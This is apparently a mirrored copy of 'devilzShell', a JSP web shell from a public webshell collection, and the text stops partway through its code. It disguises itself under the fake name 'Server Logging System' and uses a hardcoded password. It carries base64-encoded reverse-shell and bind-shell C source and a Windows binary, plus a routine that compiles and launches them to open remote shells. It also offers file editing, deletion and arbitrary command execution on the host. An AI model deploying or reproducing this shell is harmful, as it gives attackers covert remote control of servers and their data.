mirror of
https://github.com/tennc/webshell
synced 2024-11-22 19:23:05 +00:00
1319 lines
63 KiB
Text
1319 lines
63 KiB
Text
|
<%@ page contentType="text/html"%><%@ page import="java.io.*,java.util.*,java.net.*,java.text.*,sun.misc.*,java.security.*,java.lang.*,java.lang.String" %><%
|
||
|
//
|
||
|
// devilzShell <[jsp]>
|
||
|
// ^^^^^^^^^^^^
|
||
|
// author: b374k
|
||
|
// greets: devilzc0der(s) and all of you who love peace and freedom
|
||
|
//
|
||
|
//
|
||
|
// ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
|
||
|
// Jayalah Indonesiaku
|
||
|
|
||
|
|
||
|
//################ VARIABLES GOES HERE #######################=============================================]
|
||
|
String shell_name = "devilzShell";
|
||
|
String shell_fake_name = "Server Logging System";
|
||
|
String shell_title = " :: " + shell_name + " ::";
|
||
|
String shell_version = "v1";
|
||
|
String shell_password = "devilzc0der";
|
||
|
String shell_fav_port = "12345";
|
||
|
String shell_color = "#374374";
|
||
|
|
||
|
// server software
|
||
|
String xSoftware = application.getServerInfo().trim();
|
||
|
// uname -a
|
||
|
String xSystem = System.getProperty("os.name") + " " + System.getProperty("os.version") + " " + System.getProperty("os.arch");
|
||
|
// server ip
|
||
|
InetAddress inetAddress = InetAddress.getLocalHost();
|
||
|
String xServerIP = inetAddress.getHostAddress();
|
||
|
// your ip ;-)
|
||
|
String xClientIP = request.getRemoteAddr();
|
||
|
|
||
|
String xHeader = xSoftware + "<br />" + xSystem + "<br />Server IP: <span class=\"gaul\">[ </span>" + xServerIP + "<span class=\"gaul\"> ]</span> Your IP: <span class=\"gaul\">[ </span>" + xClientIP + "<span class=\"gaul\"> ]</span>";
|
||
|
|
||
|
//################# RESOURCES GOES HERE #######################=============================================]
|
||
|
String icon = "iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAB/klEQVR42o2RS2gUQRCGq7rHB0rw4miwFWVmPSmIHpaQSwQD4ivGKHsImIOyBhJETUDjRaMIEjTk4gNFIutBwScY8eBh9aBgyCGCiKu4E4kzBk0uimiI21XWwgbMorOppumuKuqr6r8RZmnjxl8iR0H2DzfKT03HsVLhV+Ove4rc8xk4uYtxdCHgGQHc/SdAuqwZB9jCAE7RnwLGR8hHbiK5/aQzCcC0FP/+u2YG4KPx2+p14SKVTbFIiPdI7/eioL98whmAt8bv3O7Y89sIv29kzOpSvENR41lSD1Jh0BQLeGf8jq3a9nayetX2KVhfeta8Gm0nuwgH0+FITSxgzPgtm3Qhs5qR+kgfqwIYGgVuTmk60EPq/p4w2B0LkG5+l7I5Ud3BUsoBBlc0uEVOakWUvxMLKNqA8V4c0rZWyZ0lzbI2M9rTpNfKD+RiAV+MX9eiCs9+yV2ecLkacPgaUvcNxcuuWHW9Pgr2xQJeGu9Us7YnjpMaFsE2FGOh8dN12l49SjjUGo4kYwE54x3eqW3fXlJjrawSMvLPN8brbtB08hypgaYwaIgFTJjE0l5l3wfAVRdIN4qQT8T/dht5btbq9pVR/lJFEUWHWhF9fnWUzxb9x8u9hwcV7ZjOD1rHXRx9mPgvoNxkqjmTwKnXyMlVgAtcxucCyMwaUMn+AMvLzBHNivq3AAAAAElFTkSuQmCC";
|
||
|
String bg = "iVBORw0KGgoAAAANSUhEUgAAAAMAAAADCAYAAABWKLW/AAAAJklEQVR42mNkAAIpKan/b968YWAEMZ49ewamGdnY2P6LiIgwgAQA8xYNYheotNcAAAAASUVORK5CYII=";
|
||
|
String xBack ="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCmludCBtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10pDQp7DQogaW50IGZkOw0KIHN0cnVjdCBzb2NrYWRkcl9pbiBzaW47IA0KIGRhZW1vbigxLDApOw0KIHNpbi5zaW5fZmFtaWx5ID0gQUZfSU5FVDsNCiBzaW4uc2luX3BvcnQgPSBodG9ucyhhdG9pKGFyZ3ZbMV0pKTsNCiBzaW4uc2luX2FkZHIuc19hZGRyID0gaW5ldF9hZGRyKGFyZ3ZbMl0pOyANCiBiemVybyhhcmd2WzJdLHN0cmxlbihhcmd2WzJdKSsxK3N0cmxlbihhcmd2WzFdKSk7IA0KIGZkID0gc29ja2V0KEFGX0lORVQsIFNPQ0tfU1RSRUFNLCBJUFBST1RPX1RDUCkgOyANCiBpZiAoKGNvbm5lY3QoZmQsIChzdHJ1Y3Qgc29ja2FkZHIgKikgJnNpbiwgc2l6ZW9mKHN0cnVjdCBzb2NrYWRkcikpKTwwKSB7DQogICBwZXJyb3IoIlstXSBjb25uZWN0KCkiKTsNCiAgIGV4aXQoMCk7DQogfQ0KIGR1cDIoZmQsIDApOw0KIGR1cDIoZmQsIDEpOw0KIGR1cDIoZmQsIDIpOw0KIGV4ZWNsKCIvYmluL3NoIiwic2giLChjaGFyICopMCk7IA0KIGNsb3NlKGZkKTsgDQp9";
|
||
|
String xBind = "I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3RyaW5nLmg+DQojaW5jbHVkZSA8c3lzL3R5cGVzLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCiNpbmNsdWRlIDxlcnJuby5oPg0KaW50IG1haW4oYXJnYyxhcmd2KQ0KaW50IGFyZ2M7DQpjaGFyICoqYXJndjsNCnsgIA0KIGludCBzb2NrZmQsIG5ld2ZkOw0KIHN0cnVjdCBzb2NrYWRkcl9pbiByZW1vdGU7DQogaWYoZm9yaygpID09IDApIHsgDQogcmVtb3RlLnNpbl9mYW1pbHkgPSBBRl9JTkVUOw0KIHJlbW90ZS5zaW5fcG9ydCA9IGh0b25zKGF0b2koYXJndlsxXSkpOw0KIHJlbW90ZS5zaW5fYWRkci5zX2FkZHIgPSBodG9ubChJTkFERFJfQU5ZKTsgDQogc29ja2ZkID0gc29ja2V0KEFGX0lORVQsU09DS19TVFJFQU0sMCk7DQogaWYoIXNvY2tmZCkgcGVycm9yKCJzb2NrZXQgZXJyb3IiKTsNCiBiaW5kKHNvY2tmZCwgKHN0cnVjdCBzb2NrYWRkciAqKSZyZW1vdGUsIDB4MTApOw0KIGxpc3Rlbihzb2NrZmQsIDUpOw0KIHdoaWxlKDEpDQogIHsNCiAgIG5ld2ZkPWFjY2VwdChzb2NrZmQsMCwwKTsNCiAgIGR1cDIobmV3ZmQsMCk7DQogICBkdXAyKG5ld2ZkLDEpOw0KICAgZHVwMihuZXdmZCwyKTsgICANCiAgIGV4ZWNsKCIvYmluL3NoIiwic2giLChjaGFyICopMCk7IA0KICAgY2xvc2UobmV3ZmQpOw0KICB9DQogfQ0KfQ0KaW50IGNocGFzcyhjaGFyICpiYXNlLCBjaGFyICplbnRlcmVkKSB7DQppbnQgaTsNCmZvcihpPTA7aTxzdHJsZW4oZW50ZXJlZCk7aSsrKSANCnsNCmlmKGVudGVyZWRbaV0gPT0gJ1xuJykNCmVudGVyZWRbaV0gPSAnXDAnOyANCmlmKGVudGVyZWRbaV0gPT0gJ1xyJykNCmVudGVyZWRbaV0gPSAnXDAnOw0KfQ0KaWYgKCFzdHJjbXAoYmFzZSxlbnRlcmVkKSkNCnJldHVybiAwOw0KfQ==";
|
||
|
String wBind = "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
|
||
|
String script_name = request.getRequestURI();
|
||
|
String shell_style = "<style type=\"text/css\">" +
|
||
|
"*{" +
|
||
|
" font-family:Tahoma,Verdana,Arial;" +
|
||
|
" font-size:12px;" +
|
||
|
" line-height:20px;" +
|
||
|
"}" +
|
||
|
"form{" +
|
||
|
" margin:0 auto;" +
|
||
|
" text-align:center;" +
|
||
|
"}" +
|
||
|
"body{" +
|
||
|
" background:url('" + script_name + "?img=bg') #333333;" +
|
||
|
" color:#ffffff;" +
|
||
|
" margin:0;" +
|
||
|
" padding:0;" +
|
||
|
"}" +
|
||
|
"input,textarea{" +
|
||
|
" background:url('" + script_name + "?img=bg') #111111;" +
|
||
|
" height:24px;" +
|
||
|
" color:#ffffff;" +
|
||
|
" padding:1.5px 4px 0 4px;" +
|
||
|
" margin:2px 0;" +
|
||
|
" border:1px solid " + shell_color + ";" +
|
||
|
" border-bottom:4px solid " + shell_color + ";" +
|
||
|
" vertical-align:middle;" +
|
||
|
"}" +
|
||
|
"input:hover,textarea:hover{" +
|
||
|
" background:#0a0a0a;" +
|
||
|
"}" +
|
||
|
"a{" +
|
||
|
" color:#ffffff;" +
|
||
|
" text-decoration:none;" +
|
||
|
"}" +
|
||
|
"a:hover{" +
|
||
|
" border-bottom:1px solid #ffffff;" +
|
||
|
"}" +
|
||
|
"h1{" +
|
||
|
" font-size:17px;" +
|
||
|
" height:20px;" +
|
||
|
" padding:2px 8px;" +
|
||
|
" background:" + shell_color + ";" +
|
||
|
" border:0;" +
|
||
|
" border-left:4px solid " + shell_color + ";" +
|
||
|
" border-right:4px solid " + shell_color + ";" +
|
||
|
" border-bottom:1px solid #222222;" +
|
||
|
" margin:0 auto;" +
|
||
|
" width:90%;" +
|
||
|
"}" +
|
||
|
"h1 img{" +
|
||
|
" vertical-align:bottom;" +
|
||
|
"}" +
|
||
|
".box{" +
|
||
|
" margin:0 auto;" +
|
||
|
" background:#000000;" +
|
||
|
" border:4px solid " + shell_color + ";" +
|
||
|
" padding:4px 8px;" +
|
||
|
" width:90%;" +
|
||
|
" text-align:justify;" +
|
||
|
"}" +
|
||
|
".gaul{" +
|
||
|
" color:" + shell_color + ";" +
|
||
|
"}" +
|
||
|
".result, .boxcode{" +
|
||
|
" margin:0 auto;" +
|
||
|
" border:1px solid " + shell_color + ";" +
|
||
|
" font-family:Lucida Console,Tahoma,Verdana;" +
|
||
|
" padding:8px;" +
|
||
|
" text-align:justify;" +
|
||
|
" overflow:hidden;" +
|
||
|
" color:#ffffff;" +
|
||
|
"}" +
|
||
|
"#explorer, table{" +
|
||
|
" width:100%;" +
|
||
|
"}" +
|
||
|
"table th{" +
|
||
|
" border-bottom:1px solid " + shell_color + ";" +
|
||
|
" background:#111111;" +
|
||
|
" padding:4px;" +
|
||
|
"}" +
|
||
|
"table td{" +
|
||
|
" padding:4px;" +
|
||
|
" border-bottom:1px solid #111111;" +
|
||
|
" vertical-align:top;" +
|
||
|
"}" +
|
||
|
".tblExplorer tr:hover, .hexview td:hover{" +
|
||
|
" background:" + shell_color + ";" +
|
||
|
"}" +
|
||
|
".hidden{" +
|
||
|
" display:none;" +
|
||
|
"}" +
|
||
|
".tblbox td {" +
|
||
|
" margin:0;" +
|
||
|
" padding:0;" +
|
||
|
" border-bottom:1px solid #222222;" +
|
||
|
"}" +
|
||
|
".tblbox tr:hover{" +
|
||
|
" background:none;" +
|
||
|
"}" +
|
||
|
"#mainwrapper{" +
|
||
|
" width:100%;" +
|
||
|
" margin:20px auto;" +
|
||
|
" text-align:center;" +
|
||
|
"}" +
|
||
|
"#wrapper{" +
|
||
|
" width:90%;" +
|
||
|
" margin:auto;" +
|
||
|
"}" +
|
||
|
".cmdbox{" +
|
||
|
" border-top:1px solid " + shell_color + ";" +
|
||
|
" border-bottom:1px solid " + shell_color + ";" +
|
||
|
" margin:4px 0;" +
|
||
|
" width:100%;" +
|
||
|
"}" +
|
||
|
".fpath{" +
|
||
|
" border-top:1px solid " + shell_color + ";" +
|
||
|
" border-bottom:1px solid " + shell_color + ";" +
|
||
|
" margin:4px 0;" +
|
||
|
" padding:4px 0;" +
|
||
|
"}" +
|
||
|
".fprop{" +
|
||
|
" border-top:1px solid " + shell_color + ";" +
|
||
|
" border-bottom:1px solid " + shell_color + ";" +
|
||
|
" margin:4px 0;" +
|
||
|
" padding:4px 0;" +
|
||
|
"}" +
|
||
|
".bottomwrapper{" +
|
||
|
" text-align:center;" +
|
||
|
"}" +
|
||
|
".btn{" +
|
||
|
" height:24px;" +
|
||
|
" background:url('" + script_name + "?img=bg') #111111;" +
|
||
|
" font-size:10px;" +
|
||
|
" text-align:right;" +
|
||
|
"}" +
|
||
|
".hexview , .hexview td{" +
|
||
|
" font-family: Lucida Console,Tahoma;" +
|
||
|
"}" +
|
||
|
"</style>";
|
||
|
%><%!
|
||
|
//################# FUNCTION GOES HERE #######################==============================================]
|
||
|
public String getSlash(){
|
||
|
if(is_win()){
|
||
|
return "\\";
|
||
|
}
|
||
|
return "/";
|
||
|
}
|
||
|
public boolean is_win(){
|
||
|
if(System.getProperty("os.name").toLowerCase().substring(0,3).equals("win")){
|
||
|
return true;
|
||
|
}
|
||
|
return false;
|
||
|
}
|
||
|
public String xcleanpath(String path){
|
||
|
if(is_dir(path)){
|
||
|
String xSlash = getSlash();
|
||
|
if(path!=null && path.length() > 1){
|
||
|
while(path.substring(path.length()-1).equals(xSlash)){
|
||
|
path = path.substring(0,path.length()-1);
|
||
|
}
|
||
|
return path + xSlash;
|
||
|
}
|
||
|
}
|
||
|
return path;
|
||
|
}
|
||
|
public String urlencode(String str){
|
||
|
try{ if(str!=null) return URLEncoder.encode(str); } catch(Exception e){ }
|
||
|
return str;
|
||
|
}
|
||
|
public String urldecode(String str){
|
||
|
try{ if(str!=null) return URLDecoder.decode(str); } catch(Exception e){ }
|
||
|
return str;
|
||
|
}
|
||
|
public String xparsedir(String dir){
|
||
|
String xSlash = "";
|
||
|
String xSlash_ = "";
|
||
|
if(is_win()){
|
||
|
xSlash = "\\";
|
||
|
xSlash_ = "\\\\";
|
||
|
}
|
||
|
else{
|
||
|
xSlash = "/";
|
||
|
xSlash_ = "/";
|
||
|
}
|
||
|
String[] dirs = dir.split(xSlash_);
|
||
|
StringBuffer buff = new StringBuffer("");
|
||
|
StringBuffer dlink = new StringBuffer("");
|
||
|
if(!is_win()){
|
||
|
dlink.append(urlencode(xSlash));
|
||
|
buff.append("<a href=\"?dir=" + dlink + "\">" + xSlash + "</a> ");
|
||
|
}
|
||
|
for(int i=0;i<dirs.length;i++){
|
||
|
String d = dirs[i].trim();
|
||
|
if(!d.equals("")){
|
||
|
dlink.append(urlencode(d + xSlash));
|
||
|
buff.append("<a href=\"?dir=" + dlink + "\">" + d + " " + xSlash + "</a> ");
|
||
|
}
|
||
|
}
|
||
|
return "<span class=\"gaul\">[ </span>" + buff + "<span class=\"gaul\"> ]</span>";
|
||
|
}
|
||
|
public boolean is_file(String fpath){
|
||
|
try{
|
||
|
File myfile = new File(fpath);
|
||
|
if(myfile.exists() && myfile.isFile()){ return true; }
|
||
|
}
|
||
|
catch(Exception e){ }
|
||
|
return false;
|
||
|
}
|
||
|
public boolean is_dir(String fpath){
|
||
|
try{
|
||
|
File myfile = new File(fpath);
|
||
|
if(myfile.exists() && myfile.isDirectory()){ return true; }
|
||
|
}
|
||
|
catch(Exception e){ }
|
||
|
return false;
|
||
|
}
|
||
|
public String xparentfolder(String fpath){
|
||
|
if(is_dir(fpath)){
|
||
|
File myfile = new File(fpath);
|
||
|
if(myfile.getParent()!=null) return myfile.getParent();
|
||
|
else return fpath;
|
||
|
}
|
||
|
return fpath;
|
||
|
}
|
||
|
public String xfileopen(String fpath){
|
||
|
try{
|
||
|
StringBuffer content = new StringBuffer("");
|
||
|
if(is_file(fpath)){
|
||
|
FileInputStream fileinputstream = new FileInputStream(fpath);
|
||
|
int numberBytes = fileinputstream.available();
|
||
|
byte bytearray[] = new byte[numberBytes];
|
||
|
fileinputstream.read(bytearray);
|
||
|
for(int i = 0; i < numberBytes; i++){
|
||
|
content.append((char) (bytearray[i]));
|
||
|
}
|
||
|
fileinputstream.close();
|
||
|
}
|
||
|
return content.toString();
|
||
|
}
|
||
|
catch (Exception e) {
|
||
|
}
|
||
|
return "";
|
||
|
}
|
||
|
public boolean xfilesave(String fullPath, byte[] bytes){
|
||
|
try{
|
||
|
OutputStream bufferedOutputStream = new BufferedOutputStream(new FileOutputStream(fullPath));
|
||
|
InputStream inputStream = new ByteArrayInputStream(bytes);
|
||
|
int token = -1;
|
||
|
while((token = inputStream.read()) != -1){
|
||
|
bufferedOutputStream.write(token);
|
||
|
}
|
||
|
bufferedOutputStream.flush();
|
||
|
bufferedOutputStream.close();
|
||
|
inputStream.close();
|
||
|
}
|
||
|
catch(Exception e){ return false; }
|
||
|
if(is_file(fullPath)){
|
||
|
return true;
|
||
|
}
|
||
|
return false;
|
||
|
}
|
||
|
public boolean xfilesave(String fullPath, String text){
|
||
|
Writer writer = null;
|
||
|
try{
|
||
|
File myFile = new File(fullPath);
|
||
|
writer = new BufferedWriter(new FileWriter(myFile));
|
||
|
writer.write(text);
|
||
|
writer.close();
|
||
|
}
|
||
|
catch (Exception e) { return false; }
|
||
|
if(is_file(fullPath)){
|
||
|
return true;
|
||
|
}
|
||
|
return false;
|
||
|
}
|
||
|
public void xrmdir(String fdir){
|
||
|
File mypath = new File(fdir);
|
||
|
|
||
|
File[] allitem = mypath.listFiles();
|
||
|
for(int i=0;i<allitem.length;i++){
|
||
|
if(allitem[i].isDirectory()){
|
||
|
xrmdir(allitem[i].getAbsolutePath());
|
||
|
}
|
||
|
else{
|
||
|
allitem[i].delete();
|
||
|
}
|
||
|
}
|
||
|
mypath.delete();
|
||
|
}
|
||
|
public long xfilesize(String fpath){
|
||
|
if(is_file(fpath)){
|
||
|
File myfile = new File(fpath);
|
||
|
return myfile.length();
|
||
|
}
|
||
|
return 0;
|
||
|
}
|
||
|
public String xparsefilesize(long size_){
|
||
|
NumberFormat pola = new DecimalFormat("#.00");
|
||
|
Double pecahan = null;
|
||
|
Double size = (double) size_;
|
||
|
if(size <= 1024) {
|
||
|
return size.toString().replace(".0","");
|
||
|
}
|
||
|
else{
|
||
|
if(size <= 1024*1024) {
|
||
|
pecahan = ((double) size) / 1024;
|
||
|
return pola.format(pecahan).replace(",",".") + " kb";
|
||
|
}
|
||
|
else {
|
||
|
pecahan = ((double) size) / 1024 / 1024;
|
||
|
return pola.format(pecahan).replace(",",".") + " mb";
|
||
|
}
|
||
|
}
|
||
|
}
|
||
|
public String xfileperms(String fpath){
|
||
|
String isreadable = "-";
|
||
|
String iswriteable = "-";
|
||
|
File myd = new File(fpath);
|
||
|
if(myd.canRead()) isreadable = "r";
|
||
|
if(myd.canWrite()) iswriteable = "w";
|
||
|
return isreadable + " / " + iswriteable;
|
||
|
}
|
||
|
public String xdrive(){
|
||
|
File roots[] = File.listRoots();
|
||
|
String letter = "";
|
||
|
if(is_win()){
|
||
|
StringBuffer letters = new StringBuffer("");
|
||
|
for(int i=0;i<roots.length;i++){
|
||
|
letter = roots[i].toString();
|
||
|
letters.append("<a href=\"?dir=" + letter + "\"><span class=\"gaul\">[ </span>");
|
||
|
letters.append(letter.substring(0,1));
|
||
|
letters.append("<span class=\"gaul\"> ]</span</a> ");
|
||
|
}
|
||
|
letters.append("<br />");
|
||
|
return letters.toString();
|
||
|
}
|
||
|
return "";
|
||
|
}
|
||
|
public String xfilelastmodified(String fpath){
|
||
|
if(is_file(fpath) || is_dir(fpath)){
|
||
|
File myfile = new File(fpath);
|
||
|
return new SimpleDateFormat("dd-MMM-yyyy HH:mm").format(new java.util.Date(myfile.lastModified()));
|
||
|
}
|
||
|
return "???";
|
||
|
}
|
||
|
public String xfilesummary(String fpath){
|
||
|
if(is_file(fpath)){
|
||
|
return "Filesize : " + xparsefilesize(xfilesize(fpath)) + " ( " + xfilesize(fpath) + " ) <span class=\"gaul\"> :: </span>Permission : " + xfileperms(fpath) + " <span class=\"gaul\"> :: </span>modified : " + xfilelastmodified(fpath);
|
||
|
}
|
||
|
return "";
|
||
|
}
|
||
|
public boolean xrunexploit(String fpath,String base64,String port,String ip){
|
||
|
String finals = "";
|
||
|
byte[] embrio = b64decode(base64);
|
||
|
String tmpdir = xcleanpath(System.getProperty("java.io.tmpdir"));
|
||
|
String fname = "";
|
||
|
String xpath = "";
|
||
|
boolean ok = false;
|
||
|
if(is_win()){
|
||
|
fname = "bd.exe";
|
||
|
xpath = xcleanpath(fpath) + fname;
|
||
|
if(is_file(xpath)){
|
||
|
File xfile = new File(xpath);
|
||
|
xfile.delete();
|
||
|
|
||
|
}
|
||
|
if(!xfilesave(xpath,embrio)){
|
||
|
xpath = tmpdir + fname;
|
||
|
if(xfilesave(xpath,embrio)) ok = true;
|
||
|
}
|
||
|
else ok = true;
|
||
|
|
||
|
if(ok){
|
||
|
finals = xpath + " " + port + " " + ip;
|
||
|
try {
|
||
|
Process p = Runtime.getRuntime().exec(finals);
|
||
|
}
|
||
|
catch(Exception e) { return false; }
|
||
|
return true;
|
||
|
}
|
||
|
}
|
||
|
else {
|
||
|
if(!ip.equals("")) fname = "back";
|
||
|
else fname = "bind";
|
||
|
String ypath = xcleanpath(fpath) + fname;
|
||
|
if(is_file(ypath + ".c")){
|
||
|
File yfile = new File(xpath + ".c");
|
||
|
yfile.delete();
|
||
|
}
|
||
|
if(!xfilesave(ypath + ".c",embrio)){
|
||
|
xpath = tmpdir + fname;
|
||
|
if(xfilesave(xpath,embrio)) ok = true;
|
||
|
}
|
||
|
else ok = true;
|
||
|
|
||
|
if(ok){
|
||
|
ekse("gcc " + ypath + ".c -o " + ypath,fpath );
|
||
|
ekse("chmod +x " + ypath,fpath);
|
||
|
if(is_file(ypath)){
|
||
|
finals = ypath + " " + port + " " + ip;
|
||
|
try{
|
||
|
Process p = Runtime.getRuntime().exec(finals);
|
||
|
}
|
||
|
catch(Exception e){ return false; }
|
||
|
return true;
|
||
|
}
|
||
|
else return false;
|
||
|
}
|
||
|
}
|
||
|
return false;
|
||
|
}
|
||
|
String ekse(String cmd, String cwd){
|
||
|
String[] comm = new String[3];
|
||
|
if(!is_win()){
|
||
|
comm[0] = "/bin/sh";comm[1] = "-c";comm[2] = cmd;
|
||
|
}else{
|
||
|
comm[0] = "cmd";comm[1] = "/C";comm[2] = cmd;
|
||
|
